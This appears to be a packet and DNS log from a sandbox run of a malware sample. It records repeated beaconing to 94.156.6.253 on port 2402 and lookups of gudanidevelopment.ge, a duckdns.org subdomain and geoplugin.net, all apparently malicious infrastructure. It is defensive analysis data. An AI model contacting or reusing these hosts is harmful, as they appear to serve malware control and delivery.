                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.511534929 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.511605978 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.511667967 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.511674881 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.511744976 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.511815071 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.511847973 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.511884928 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.511910915 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.511955976 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.512052059 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.512061119 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.512151957 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.512221098 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.512264013 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.512290955 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.512360096 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.512428045 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.512478113 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.512497902 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.512542009 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.512567997 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.512636900 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.512706041 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.512711048 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.512775898 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.512795925 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.512845993 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.512913942 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.512981892 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.512988091 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.513051033 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.513119936 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.513178110 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.513190031 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.513241053 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.513259888 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.513329029 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.513391972 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.513397932 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.513467073 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.513495922 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.513536930 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.513606071 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.513669968 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.513674974 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.513745070 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.513756990 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.513813972 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.513883114 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.513951063 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.513951063 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.514023066 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.514038086 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.514250040 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.707406998 CEST8050057178.237.33.50192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.707628965 CEST5005780192.168.11.20178.237.33.50
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.752511024 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.752604961 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.752690077 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.752774954 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.752830982 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.752835989 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.752902985 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.752959013 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.752989054 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.753031015 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.753057957 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.753108978 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.753181934 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.753236055 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.753268957 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.753308058 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.753361940 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.753437996 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.753438950 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.753488064 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.753510952 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.753595114 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.753652096 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.753652096 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.753745079 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.753813028 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.753817081 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.753876925 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.753896952 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.753967047 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.754043102 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.754081011 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.754143953 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.762851000 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.762860060 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.762902975 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.762936115 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.762953997 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.763005972 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.763040066 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.763056993 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.763108969 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.763144016 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.763163090 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.763215065 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.763247967 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.763266087 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.763318062 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.763351917 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.763370037 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.763422012 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.763473034 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.763477087 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.763492107 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.763505936 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.763520002 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.763534069 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.763547897 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.763556004 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.763607979 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.763607979 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.763705015 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.995136976 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.995296001 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.995387077 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.995480061 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.995560884 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.995577097 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.995671034 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.995686054 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.995779991 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.995878935 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.995929003 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.995965004 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.996129990 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.996151924 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.996226072 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.996316910 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.996404886 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.996412039 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.996511936 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.996570110 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.996576071 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.996638060 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.996697903 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.996768951 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.996783972 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.996828079 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.996849060 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.996947050 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.997034073 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.997055054 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.997100115 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.997114897 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.997201920 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.997284889 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.997302055 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.997350931 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.997459888 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.997508049 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.997545004 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.997625113 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.997718096 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.997724056 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.997802019 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.997886896 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.997889042 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.997948885 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.997973919 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.998069048 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.998158932 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.998209953 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.998270988 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.998369932 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.998383999 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.998465061 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.998547077 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.998629093 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.998651981 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.998711109 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.998727083 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.998805046 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.998889923 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.998938084 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.999000072 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.999064922 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.999110937 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.999155045 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.999269962 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.999278069 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:28:52.999334097 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:57.457161903 CEST24025005694.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:28:57.457396030 CEST500562402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:29:03.238332987 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:29:03.242832899 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:29:03.524553061 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:29:34.265093088 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:29:34.267484903 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:29:34.555697918 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:30:04.920779943 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:30:04.922561884 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:30:05.212119102 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:30:35.527026892 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:30:35.528805017 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:30:35.821644068 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:30:36.335377932 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:30:36.335388899 CEST5005780192.168.11.20178.237.33.50
                                                                                                                                                                                                                  Oct 26, 2023 14:30:36.960314989 CEST5005780192.168.11.20178.237.33.50
                                                                                                                                                                                                                  Oct 26, 2023 14:30:37.100872993 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:30:38.194410086 CEST5005780192.168.11.20178.237.33.50
                                                                                                                                                                                                                  Oct 26, 2023 14:30:38.616178989 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:30:40.662610054 CEST5005780192.168.11.20178.237.33.50
                                                                                                                                                                                                                  Oct 26, 2023 14:30:41.646779060 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:30:45.583197117 CEST5005780192.168.11.20178.237.33.50
                                                                                                                                                                                                                  Oct 26, 2023 14:30:47.707937956 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:30:55.425000906 CEST5005780192.168.11.20178.237.33.50
                                                                                                                                                                                                                  Oct 26, 2023 14:30:59.830200911 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:31:06.151568890 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:31:06.153207064 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:31:06.430888891 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:31:15.108172894 CEST5005780192.168.11.20178.237.33.50
                                                                                                                                                                                                                  Oct 26, 2023 14:31:24.059364080 CEST5005480192.168.11.20217.147.225.69
                                                                                                                                                                                                                  Oct 26, 2023 14:31:37.139636993 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:31:37.141819000 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:31:37.430810928 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:32:07.665050030 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:32:07.668981075 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:32:07.961899996 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:32:38.870174885 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:32:38.872107029 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:32:39.165306091 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:33:09.358988047 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:33:09.360394001 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:33:09.649444103 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:33:39.968223095 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:33:40.003154993 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:33:40.290652037 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:34:10.945081949 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:34:10.946135044 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:34:11.243419886 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:34:41.426404953 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:34:41.427474976 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:34:41.727790117 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:35:12.486264944 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:35:12.487346888 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:35:12.774915934 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:35:43.337934017 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:35:43.339102983 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:35:43.634130001 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:36:13.951186895 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:36:13.952172041 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:36:14.243530989 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:36:45.071870089 CEST24025005594.156.6.253192.168.11.20
                                                                                                                                                                                                                  Oct 26, 2023 14:36:45.072879076 CEST500552402192.168.11.2094.156.6.253
                                                                                                                                                                                                                  Oct 26, 2023 14:36:45.352883101 CEST24025005594.156.6.253192.168.11.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 26, 2023 14:28:46.374574900 CEST | 59429 | 53 | 192.168.11.20 | 1.1.1.1
Oct 26, 2023 14:28:47.375406981 CEST | 59429 | 53 | 192.168.11.20 | 9.9.9.9
Oct 26, 2023 14:28:47.396588087 CEST | 53 | 59429 | 1.1.1.1 | 192.168.11.20
Oct 26, 2023 14:28:48.181014061 CEST | 53 | 59429 | 9.9.9.9 | 192.168.11.20
Oct 26, 2023 14:28:50.106173992 CEST | 50421 | 53 | 192.168.11.20 | 1.1.1.1
Oct 26, 2023 14:28:50.276218891 CEST | 53 | 50421 | 1.1.1.1 | 192.168.11.20
Oct 26, 2023 14:28:51.073072910 CEST | 61700 | 53 | 192.168.11.20 | 1.1.1.1
Oct 26, 2023 14:28:51.203661919 CEST | 53 | 61700 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 26, 2023 14:28:46.374574900 CEST | 192.168.11.20 | 1.1.1.1 | 0xf64 | Standard query (0) | gudanidevelopment.ge | A (IP address) | IN (0x0001) | false
Oct 26, 2023 14:28:47.375406981 CEST | 192.168.11.20 | 9.9.9.9 | 0xf64 | Standard query (0) | gudanidevelopment.ge | A (IP address) | IN (0x0001) | false
Oct 26, 2023 14:28:50.106173992 CEST | 192.168.11.20 | 1.1.1.1 | 0x3386 | Standard query (0) | ourt2949aslumes9.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 26, 2023 14:28:51.073072910 CEST | 192.168.11.20 | 1.1.1.1 | 0x3ef8 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 26, 2023 14:28:47.396588087 CEST | 1.1.1.1 | 192.168.11.20 | 0xf64 | No error (0) | gudanidevelopment.ge | | 217.147.225.69 | A (IP address) | IN (0x0001) | false
Oct 26, 2023 14:28:48.181014061 CEST | 9.9.9.9 | 192.168.11.20 | 0xf64 | No error (0) | gudanidevelopment.ge | | 217.147.225.69 | A (IP address) | IN (0x0001) | false
